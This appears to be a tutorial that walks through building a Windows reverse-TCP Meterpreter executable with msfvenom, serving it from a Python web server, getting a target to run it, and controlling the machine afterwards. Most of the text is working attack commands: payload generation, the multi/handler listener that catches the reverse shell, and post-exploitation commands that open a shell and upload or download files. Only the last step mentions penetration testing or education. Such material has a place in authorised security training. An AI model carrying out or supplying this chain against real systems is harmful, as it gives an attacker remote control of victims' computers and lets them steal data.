Step 1: Generating the Malicious .exe File using msfvenom

msfvenom is a part of the Metasploit Framework used to generate malicious payloads. Here, we will generate an .exe file designed to reverse connect back to the attacker’s system.

Run the following command to create a malicious .exe file:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your-IP-Address> LPORT=<Port> -f exe > malicious.exe

• -p windows/meterpreter/reverse_tcp: Specifies the payload, in this case, a reverse TCP meterpreter shell for Windows.
• LHOST: Your machine’s IP address (the attacker’s IP).
• LPORT: The port on which you want to receive the connection (commonly port 4444).
• -f exe: Tells msfvenom to generate a Windows .exe file.
• > malicious.exe: The output file will be named malicious.exe.

For example:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > malicious.exe

Step 2: Setting up the Metasploit Listener

Now that the malicious .exe file has been generated, you need to set up a listener in Metasploit to capture the reverse shell connection.

1. Start Metasploit: Open a terminal and start the Metasploit console by running:

msfconsole

2. Set the Exploit Listener: Use the multi/handler module, which listens for reverse shells:

use exploit/multi/handler

3. Set the Payload: Tell Metasploit what kind of payload to expect. Since we generated a reverse TCP meterpreter payload in step 1, we’ll set it like this:

set payload windows/meterpreter/reverse_tcp

4. Configure LHOST and LPORT: Set the listening IP address and port to match the values you used when generating the payload:

set LHOST <Your-IP-Address>

set LPORT <Port>

For example:

set LHOST 192.168.1.100

set LPORT 4444

5. Start the Listener: Run the following command to start the exploit listener:

exploit

The listener is now ready to catch any incoming connection from the malicious .exe file.

Step 3: Hosting the Malicious .exe File Using Python’s http.server

In this step, you’ll host the malicious .exe file on a local web server so that the target can download it. We’ll use Python’s built-in web server for this.

1. Navigate to the Directory: First, navigate to the directory where the malicious.exe file is located:

cd /path/to/malicious.exe

2. Start the Python Web Server: Run the following command to start the Python HTTP server on port 8000:

python3 -m http.server 8000

This will host the file on your local IP, and the target can download it by visiting http://<Your-IP-Address>:8000/malicious.exe.

Example:

python3 -m http.server 8000

Step 4: Downloading and Executing the Malicious File on the Target

At this stage, you need the target (Windows machine) to download and run the malicious.exe file.

1. Target Downloads the File: On the target machine, use a web browser to download the file from your server:

http://<Your-IP-Address>:8000/malicious.exe

Example:

http://192.168.1.100:8000/malicious.exe

2. Target Executes the File: Once downloaded, instruct the target to run the malicious.exe file. This will trigger the reverse shell, connecting back to your Metasploit listener.

Step 5: Getting a Meterpreter Session

If everything has been set up correctly, as soon as the target executes the .exe file, you should see a meterpreter session open in your Metasploit console.

You’ll receive a prompt like this:

meterpreter >

Now you have a meterpreter session on the target machine, and you can execute commands to control the target.

Step 6: Post-Exploitation with Meterpreter

Once you have control of the target machine, you can use the following meterpreter commands:

• Get system information:

sysinfo

• Get a shell:

shell

• List running processes:

ps

• Capture a screenshot:

    screenshot

• Download files from the target:

download <file-path>

• Upload files to the target:

upload <local-file-path> <remote-directory>

• Terminate the session:

exit

Step 7: Cleaning Up

1. Stop the Python HTTP Server: In the terminal where you started the Python web server, press Ctrl+C to stop it.
2. Close the Metasploit Session: In the Metasploit console, you can stop the exploit by typing:

exit

3. Remove the Malicious File: Ensure that you remove the malicious .exe file from your system after testing, and inform the target system administrator if this was part of a penetration test or educational exercise.